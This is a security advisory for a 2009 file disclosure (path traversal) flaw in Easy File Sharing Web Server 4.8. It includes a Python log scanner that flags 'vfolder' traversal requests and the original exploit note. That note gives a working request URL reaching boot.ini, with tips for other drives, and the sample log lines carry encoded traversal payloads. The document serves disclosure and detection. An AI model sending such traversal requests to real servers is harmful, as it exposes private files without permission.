File Disclosure Vulnerability
Vendor: Easy File Sharing Web Server
By: Mountassif Moad
CVSS: 7.5 (HIGH)
CWE: 22
Product Name: Easy File Sharing Web Server
Affected Version From: 4.8
Affected Version To: 4.8
Patch Exists: YES
Related CWE: N/A
CPE: a:ezbsystems:easy_file_sharing_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP 2
2009

Easy File Sharing Web Server File Disclosure Vulnerability

Easy File Sharing Web Server 4.8 contains a vulnerability that allows an attacker to view the contents of any file on the server by sending a specially crafted HTTP request. The request's 'vfolder' parameter specifies the file to be viewed, and the server accepts a relative path in it, so an attacker can view any file on the server.

Mitigation:

Upgrade to the latest version of Easy File Sharing Web Server.
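
Until the upgrade is in place, web logs can be checked for requests of the kind described above. The following is an added example, not part of the original advisory or the vendor's code: it flags thumbnail.ghp requests whose 'vfolder' value climbs above its starting folder, including percent-encoded and backslash variants. The Common Log Format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Common Log Format (assumed format, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Mar/2009:10:00:01 +0000] "GET /disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini HTTP/1.1" 200 211',
    '192.0.2.11 - - [04/Mar/2009:10:00:05 +0000] "GET /disk_c/thumbnail.ghp?vfolder=photos/../docs HTTP/1.1" 200 5120',
    '192.0.2.12 - - [04/Mar/2009:10:00:09 +0000] "GET /disk_d/thumbnail.ghp?vfolder=%252e%252e%255c%252e%252e%255cboot.ini HTTP/1.1" 404 0',
    '192.0.2.13 - - [04/Mar/2009:10:00:12 +0000] "GET /index.htm HTTP/1.1" 200 1033',
]

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_root(vfolder):
    """True if the path, read relative to its starting folder, climbs above it."""
    path = fully_unquote(vfolder).replace("\\", "/")  # Windows accepts both separators
    depth = 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue                  # empty and '.' segments do not change depth
        depth += -1 if segment == ".." else 1
        if depth < 0:
            return True
    return False

def find_traversal_requests(lines):
    """Return (client, decoded vfolder) for thumbnail.ghp requests that escape the root."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/thumbnail.ghp"):
            continue
        for value in parse_qs(url.query).get("vfolder", []):
            if escapes_root(value):
                hits.append((client, fully_unquote(value)))
    return hits

if __name__ == "__main__":
    for client, value in find_traversal_requests(SAMPLE_LOG):
        print(f"{client} requested vfolder={value!r}")
```

A value such as photos/../docs stays inside its starting folder and is not reported, which keeps ordinary navigation out of the results.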

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Easy File Sharing Web Server File Disclosure Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Program:  Easy File Sharing Web Server
Version:  4.8
Download: http://www.sharing-file.com/efssetup.exe
Found by Mountassif Moad
www.v4-team.com

-- Bug --
Exploit :

http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini
If you have a hard disk like d or f, change disk_c to disk_d or disk_f; some hosts don't have this,
and if it doesn't work on the first test, try to register and test again.
Tested on win xp SP 2 fr

# milw0rm.com [2009-03-04]